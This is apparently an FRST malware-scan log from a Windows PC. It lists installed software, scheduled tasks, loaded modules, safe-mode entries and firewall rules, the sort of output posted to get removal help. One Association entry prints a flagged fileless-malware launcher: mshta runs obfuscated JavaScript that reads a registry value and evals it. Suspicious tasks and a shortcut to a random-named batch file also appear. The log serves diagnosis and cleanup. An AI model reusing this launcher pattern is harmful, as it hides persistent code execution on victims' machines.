NVIDIA 3D Vision Driver 368.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 368.81 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.11.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.4.0 - NVIDIA Corporation)
NVIDIA Graphics Driver 368.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 368.81 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.15 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.15 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
Orcs Must Die! Unchained (HKLM\...\Steam App 427270) (Version:  - Robot Entertainment)
Ostrich Island (HKLM-x32\...\Steam App 337270) (Version:  - MeDungeon Ltd.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7541 - Realtek Semiconductor Corp.)
Realtek USB Audio (HKLM-x32\...\{0A46A65D-89AC-464C-8026-3CD44960BD04}) (Version: 6.3.9600.41 - Realtek Semiconductor Corp.)
SafeZone Stable 1.48.2066.44 (x32 Version: 1.48.2066.44 - Avast Software) Hidden
SafeZone Stable 1.51.2220.62 (x32 Version: 1.51.2220.62 - Avast Software) Hidden
SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.11.4.0 - NVIDIA Corporation) Hidden
Skype™ 7.30 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.30.105 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Vulkan Run Time Libraries 1.0.11.1 (HKLM\...\VulkanRT1.0.11.1) (Version: 1.0.11.1 - LunarG, Inc.)
Wacom Tablet (HKLM\...\Wacom Tablet Driver) (Version: 6.3.16-2 - Wacom Technology Corp.)
WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WIDCOMM Bluetooth Software (HKLM\...\{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.6650 - Broadcom Corporation)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
XSplit Broadcaster (HKLM-x32\...\{4366B373-1578-43E9-8FC9-3C5D6D529314}) (Version: 2.8.1607.1936 - SplitmediaLabs)
XSplit Gamecaster (HKLM-x32\...\{D3C9DBAA-5395-4971-A962-553C7DBEA423}) (Version: 2.8.1605.2355 - SplitmediaLabs)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1863785947-2063213224-1850305329-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {1D4FCD0B-833F-4673-AF4F-C1D32AB526D0} - System32\Tasks\{0DCDAAAA-93EF-49E2-AA0E-3E402E8F35FA} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2016-08-24] (Adobe Systems Incorporated)
Task: {23C4AFE3-C344-4CC1-B947-6F7861B09475} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-01] (Google Inc.)
Task: {3104D2E9-1327-4154-B022-A2E5A75C217A} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\Dell\SupportAssist\sessionchecker.exe [2016-09-13] (PC-Doctor, Inc.)
Task: {34DEFD4E-26EB-489B-B544-9DCC0C99C02E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-01-08] (Adobe Systems Incorporated)
Task: {4680A0DC-A27E-4500-8101-3C3720F498FC} - System32\Tasks\{CCA1CD58-709C-423B-BBBB-0C7DBE39E355} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2016-08-24] (Adobe Systems Incorporated)
Task: {4FBD19BD-BBF9-4DB7-B505-6228C0876E94} - System32\Tasks\{528BCCA3-349E-4E64-BAF5-C898CCD7538F} => C:\Users\Owner\Downloads\FixToolKotver64.exe
Task: {51B3635B-5D21-4E7D-A92A-01533537CCD7} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-06-02] (AVAST Software)
Task: {555CC1F2-72BC-40E7-869B-59C3B9120774} - System32\Tasks\{6418743D-1170-48C9-9BCE-CBDA001F2EF3} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2016-08-24] (Adobe Systems Incorporated)
Task: {5AC7F887-71CA-4AA1-96A4-0A5E34D1F1BB} - System32\Tasks\AdobeAAMUpdater-1.0-Owner-PC-Owner => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
Task: {67A0DA7E-E534-48A2-8A20-44047E59A2D5} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {6C79847C-860A-4953-AA45-A65B21DF1150} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-08-04] (Dropbox, Inc.)
Task: {800C4F0A-B96F-4306-8FC6-01AABCB3E309} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-01] (Google Inc.)
Task: {828E25EE-E30B-477C-BB58-2F53210A9F30} - System32\Tasks\UninstallDDS-C960901F-CE14-4DE1-9729-1305F719A337 => C:\Windows\TEMP\DeleteFolderTask.exe <==== ATTENTION
Task: {896E6B83-C449-4EBF-B8A0-8B6D8E8B78CD} - System32\Tasks\BullGuard\BullGuardUpdate2 => C:\Program Files\BullGuard Ltd\BullGuard\BullGuardUpdate2.exe [2016-12-12] (BullGuard Ltd.)
Task: {8DCDEE16-AEB7-42B2-B7F8-C48F3E74066D} - System32\Tasks\SafeZone scheduled Autoupdate 1458696918 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2016-09-06] (Avast Software)
Task: {8EBB3B0F-59FA-41FE-899B-DF576A5B1C11} - System32\Tasks\PCDDataUploadTask => uaclauncher.exe
Task: {B5CC74E1-44F2-46C0-9524-F3043147FDE8} - System32\Tasks\{0BBD4685-2739-46A6-8DF8-C548A726405D} => C:\Users\Owner\Downloads\FixToolKotver64.exe
Task: {BF380B2F-370F-4DE2-8998-A2681C51FFDB} - System32\Tasks\{B042A631-BD1D-41D8-901A-5601A5BAD7F0} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2016-08-24] (Adobe Systems Incorporated)
Task: {D257D2D9-DBD5-4DE2-B470-0269294D41D0} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-06-25] (Adobe Systems Incorporated)
Task: {DA220C2C-86E5-4104-9CE4-34070D5F9C3D} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-10-03] (AVAST Software)
Task: {E75EB6BB-4C1C-40AB-A7F7-60D5A2D309FF} - System32\Tasks\Dell SupportAssistAgent AutoUpdate => C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssist.exe [2016-09-09] (Dell Inc.)
Task: {EEA26988-B289-48A6-A4F5-4F3D5FAB5A80} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {F1C6BBBF-4E97-427D-B1DD-42BD81992A6E} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-08-04] (Dropbox, Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
Shortcut: C:\Users\Owner\AppData\Local\c345b\ce9d6.lnk -> C:\Users\Owner\AppData\Local\c345b\a0f5a.bat (No File)
 
==================== Loaded Modules (Whitelisted) ==============
 
2016-12-12 07:32 - 2016-12-12 07:32 - 00727320 _____ () c:\program files\bullguard ltd\bullguard\SQLite.dll
2016-12-12 07:32 - 2016-12-12 07:32 - 00084248 _____ () c:\program files\bullguard ltd\bullguard\zlib1.dll
2016-12-12 07:32 - 2016-12-12 07:32 - 00644888 _____ () c:\program files\bullguard ltd\bullguard\LibXml2.dll
2015-12-22 21:46 - 2016-07-10 15:17 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-10-05 18:17 - 2016-10-05 18:17 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-11-17 01:28 - 2016-11-17 01:28 - 01353528 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-12-12 07:32 - 2016-12-12 07:32 - 00644888 _____ () C:\Program Files\BullGuard Ltd\BullGuard\LibXml2.dll
2016-12-12 07:31 - 2016-12-12 07:31 - 00064792 _____ () C:\Program Files\BullGuard Ltd\BullGuard\LIBBZ2.dll
2016-12-12 07:32 - 2016-12-12 07:32 - 00084248 _____ () C:\Program Files\BullGuard Ltd\BullGuard\zlib1.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 00367552 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 03611584 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll
2016-02-02 10:53 - 2016-06-14 12:03 - 00288192 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2016-12-21 12:39 - 2016-12-14 12:55 - 02259232 _____ () D:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2016-05-22 18:33 - 2016-05-22 18:33 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 02665920 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 01988544 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 01840576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll
2016-02-02 10:53 - 2016-06-14 12:03 - 00207296 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll
2016-12-12 07:32 - 2016-12-12 07:32 - 00727320 _____ () C:\Program Files\BullGuard Ltd\BullGuard\SQLite.dll
2016-05-28 23:38 - 2016-03-21 12:28 - 01357264 _____ () C:\Program Files\Tablet\Wacom\libxml2.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 00034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 00920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2016-10-03 00:42 - 2016-10-03 00:42 - 00169064 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-10-03 00:42 - 2016-10-03 00:42 - 00482928 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2017-01-10 12:45 - 2017-01-10 12:45 - 03138632 _____ () C:\Program Files\AVAST Software\Avast\defs\17011001\algo.dll
2016-02-02 10:53 - 2016-06-14 12:03 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-02-01 15:29 - 2016-12-08 07:13 - 00656160 _____ () D:\games\SDL2.dll
2016-02-01 15:29 - 2016-08-31 17:02 - 04969248 _____ () D:\games\v8.dll
2016-02-01 15:29 - 2016-08-31 17:02 - 01563936 _____ () D:\games\icui18n.dll
2016-02-01 15:29 - 2016-08-31 17:02 - 01195296 _____ () D:\games\icuuc.dll
2016-02-01 15:29 - 2016-12-19 18:25 - 02322720 _____ () D:\games\video.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 02549760 _____ () D:\games\libavcodec-56.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 00442880 _____ () D:\games\libavutil-54.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 00491008 _____ () D:\games\libavformat-56.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 00332800 _____ () D:\games\libavresample-2.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 00485888 _____ () D:\games\libswscale-3.dll
2016-02-01 15:29 - 2016-12-19 18:25 - 00838944 _____ () D:\games\bin\chromehtml.DLL
2016-03-14 08:25 - 2016-07-04 14:17 - 00266560 _____ () D:\games\openvr_api.dll
2016-11-17 01:29 - 2016-11-17 01:29 - 01041720 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2016-10-05 18:18 - 2016-10-05 18:18 - 00080184 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2016-11-17 01:28 - 2016-11-17 01:28 - 00189752 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2016-10-03 00:42 - 2016-10-03 00:42 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2016-12-15 08:51 - 2016-12-05 08:21 - 67304736 _____ () D:\games\bin\cef\cef.win7\libcef.dll
2016-02-01 15:29 - 2016-12-19 18:25 - 00388384 _____ () D:\games\steam.dll
2016-02-01 15:29 - 2015-09-24 15:52 - 00119208 _____ () D:\games\winh264.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 02144104 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 07955304 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 00341352 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 00028008 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 00127336 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2016-08-04 13:36 - 2016-11-11 12:36 - 00035792 _____ () C:\Program Files (x86)\Dropbox\Client\_multiprocessing.pyd
2016-08-04 13:36 - 2016-11-11 12:36 - 00100296 _____ () C:\Program Files (x86)\Dropbox\Client\_ctypes.pyd
2016-08-04 13:36 - 2016-11-11 12:36 - 00018888 _____ () C:\Program Files (x86)\Dropbox\Client\select.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00019760 _____ () C:\Program Files (x86)\Dropbox\Client\tornado.speedups.pyd
2016-08-04 13:36 - 2016-11-11 12:36 - 00694224 _____ () C:\Program Files (x86)\Dropbox\Client\unicodedata.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00020816 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._constant_time.pyd
2016-08-04 13:36 - 2016-11-11 12:37 - 00123856 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_backend.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 01682760 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._openssl.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00020808 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._padding.pyd
2016-12-21 16:48 - 2016-11-11 12:36 - 00145864 _____ () C:\Program Files (x86)\Dropbox\Client\pyexpat.pyd
2016-12-21 16:48 - 2016-11-11 12:37 - 00019408 _____ () C:\Program Files (x86)\Dropbox\Client\faulthandler.pyd
2016-12-21 16:48 - 2016-11-11 12:36 - 00116688 _____ () C:\Program Files (x86)\Dropbox\Client\pywintypes27.dll
2016-08-04 13:36 - 2016-11-11 12:38 - 00105928 _____ () C:\Program Files (x86)\Dropbox\Client\win32api.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00021312 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.crt.compiled._winffi_crt.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00052024 _____ () C:\Program Files (x86)\Dropbox\Client\psutil._psutil_windows.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00038696 _____ () C:\Program Files (x86)\Dropbox\Client\fastpath.pyd
2016-12-21 16:48 - 2016-11-11 12:36 - 00392144 _____ () C:\Program Files (x86)\Dropbox\Client\pythoncom27.dll
2016-12-21 16:48 - 2016-11-11 12:38 - 00020936 _____ () C:\Program Files (x86)\Dropbox\Client\mmapfile.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00024528 _____ () C:\Program Files (x86)\Dropbox\Client\win32event.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00116176 _____ () C:\Program Files (x86)\Dropbox\Client\win32security.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00381752 _____ () C:\Program Files (x86)\Dropbox\Client\win32com.shell.shell.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00124880 _____ () C:\Program Files (x86)\Dropbox\Client\win32file.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00025424 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.kernel32.compiled._winffi_kernel32.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32clipboard.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00175560 _____ () C:\Program Files (x86)\Dropbox\Client\win32gui.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00030160 _____ () C:\Program Files (x86)\Dropbox\Client\win32pipe.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00043472 _____ () C:\Program Files (x86)\Dropbox\Client\win32process.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00048592 _____ () C:\Program Files (x86)\Dropbox\Client\win32service.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00057808 _____ () C:\Program Files (x86)\Dropbox\Client\win32evtlog.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32profile.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00246592 _____ () C:\Program Files (x86)\Dropbox\Client\breakpad.client.windows.handler.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00026456 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox.infinite.win.compiled._driverinstallation.pyd
2016-08-04 13:36 - 2016-11-11 12:37 - 00241104 _____ () C:\Program Files (x86)\Dropbox\Client\_jpegtran.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00020280 _____ () C:\Program Files (x86)\Dropbox\Client\cpuid.compiled._cpuid.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00028616 _____ () C:\Program Files (x86)\Dropbox\Client\win32ts.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00023376 _____ () C:\Program Files (x86)\Dropbox\Client\winscreenshot.compiled._CaptureScreenshot.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.iphlpapi._winffi_iphlpapi.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00019776 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winerror._winffi_winerror.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.wininet._winffi_wininet.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00350152 _____ () C:\Program Files (x86)\Dropbox\Client\winxpgui.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00022352 _____ () C:\Program Files (x86)\Dropbox\Client\winverifysignature.compiled._VerifySignature.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00024392 _____ () C:\Program Files (x86)\Dropbox\Client\librsyncffi.compiled._librsyncffi.pyd
2016-12-21 16:48 - 2016-11-11 12:35 - 00036296 _____ () C:\Program Files (x86)\Dropbox\Client\librsync.dll
2016-12-21 16:48 - 2016-12-21 10:26 - 00084280 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox_sqlite_ext.DLL
2016-12-21 16:48 - 2016-12-21 10:26 - 01826096 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtCore.pyd
2016-08-04 13:36 - 2016-11-11 12:37 - 00083912 _____ () C:\Program Files (x86)\Dropbox\Client\sip.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00531248 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtNetwork.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 03928880 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWidgets.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 01972528 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtGui.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00133424 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKit.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00224056 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKitWidgets.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00207672 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtPrintSupport.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00020288 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.user32._winffi_user32.pyd
2016-12-21 16:48 - 2016-11-11 12:42 - 00017864 _____ () C:\Program Files (x86)\Dropbox\Client\libEGL.dll
2016-12-21 16:48 - 2016-11-11 12:42 - 01631184 _____ () C:\Program Files (x86)\Dropbox\Client\libGLESv2.dll
2016-12-21 16:48 - 2016-12-21 10:26 - 00042808 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebChannel.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00171320 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebEngineWidgets.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00357680 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQml.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00060880 _____ () C:\Program Files (x86)\Dropbox\Client\win32print.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00024904 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winhttp.compiled._winffi_winhttp.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00546096 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQuick.pyd
2015-09-04 19:34 - 2015-09-04 19:34 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2015-12-22 21:49 - 2015-01-27 08:26 - 01905904 ____N () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\STRestoreAPI.dll
2015-12-22 21:49 - 2012-11-25 20:19 - 01153384 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\libxml2.dll
2015-12-22 21:49 - 2014-02-18 12:12 - 00117568 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\zlib1.dll
2016-12-15 09:21 - 2016-12-07 23:29 - 01829208 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libglesv2.dll
2016-12-15 09:21 - 2016-12-07 23:29 - 00085848 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libegl.dll
2016-12-15 22:12 - 2016-12-15 22:12 - 17833560 _____ () C:\Users\Owner\AppData\Local\Google\Chrome\User Data\PepperFlash\24.0.0.186\pepflashplayer.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\37065567.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\44097241.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\70022230.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BsMain => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BsScanner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\37065567.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\44097241.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\70022230.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BsMain => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BsScanner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BsUpdate => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\Software\Classes\75a29: "C:\Windows\system32\mshta.exe" "javascript:Dv6Ty="kpDGulS";W8f=new ActiveXObject("WScript.Shell");aCVk71="PBz2";D4kLn=W8f.RegRead("HKCU\\software\\bykshfet\\noce");A4M5Vb="HZmwr";eval(D4kLn);WFchl11xY="O5wuSTc";" <===== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\dell.com -> dell.com
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 18:34 - 2009-06-10 13:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.254.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [SPPSVC-In-TCP] => %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{A543F10B-7594-41E4-BB78-74DD4CFEFAD0}] => D:\games\Steam.exe
FirewallRules: [{504E1E8F-1998-4A28-B535-816B582F3EF7}] => D:\games\Steam.exe
FirewallRules: [{537E98E5-CCC8-4EA6-A3DE-DE239833CEB9}] => D:\games\bin\steamwebhelper.exe
FirewallRules: [{27A13F94-FBF5-4304-8E9A-27C8F6377CAE}] => D:\games\bin\steamwebhelper.exe
FirewallRules: [{DF55312E-A87E-4636-9AEB-22CC4CCFCED8}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
